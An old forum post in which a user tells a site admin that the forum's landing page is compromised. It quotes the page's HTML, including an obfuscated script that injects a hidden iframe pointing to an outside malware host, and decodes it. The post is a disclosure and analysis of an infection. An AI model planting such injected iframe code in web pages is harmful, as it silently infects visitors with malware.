Thread: B1 Infected !
View Single Post
  #18  
Old 11th Nov 07, 08:47 PM
Cactus's Avatar
Cactus Cactus is offline
BetaONE Supporter
  
Join Date: Jul 2001
Posts: 819
Cactus is an unknown quantity at this point
DoG,

Now don't tell me you really coudn't find this....

The first page when surfing to B1 is named "BetaONE Hotfix" and has the following HTML code:

Code:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
  <title>BetaONE Hotfix</title>
</head>

<body><Script Language="Javascript">document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%6D%6E%39%36%2E%64%6E%73%2E%67%65%6E%64%69%73%74%72%2E%69%6E%66%6F%2F%71%75%61%6C%69%74%79%74%65%73%74%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E'));</script>
   <meta http-equiv="refresh" content="0; url=http://www.betaone.net/forum" />
</body>

</html>
The Javascript code (unescaped) is
Code:
<iframe src="http://mn96.dns.gendistr.info/qualitytest" width=1 height=1></iframe>'
That page (after some more site switching) eventualy leaves you infected with what Symantec call's Trojan.Exploit.131 (see http://securityresponse.symantec.com...033008-3019-99) after witch it loads the betaone.net/forum page as if all is well.

So sure, the server might not be infected, but the index.php contains code that will get you infected. Now don't tell me you didn't see this, i mean, come on

Oh, and I saw today is yout birthday. Congratulations! Have a beer on me!

Anyways,
Cheers,

Le Cactus
__________________
Quote:
Several security vulnerabilities in Firefox and the Mozilla Suite of Internet software put users of the open-source products at risk of hacker attacks, the Mozilla Foundation is warning.
Reply With Quote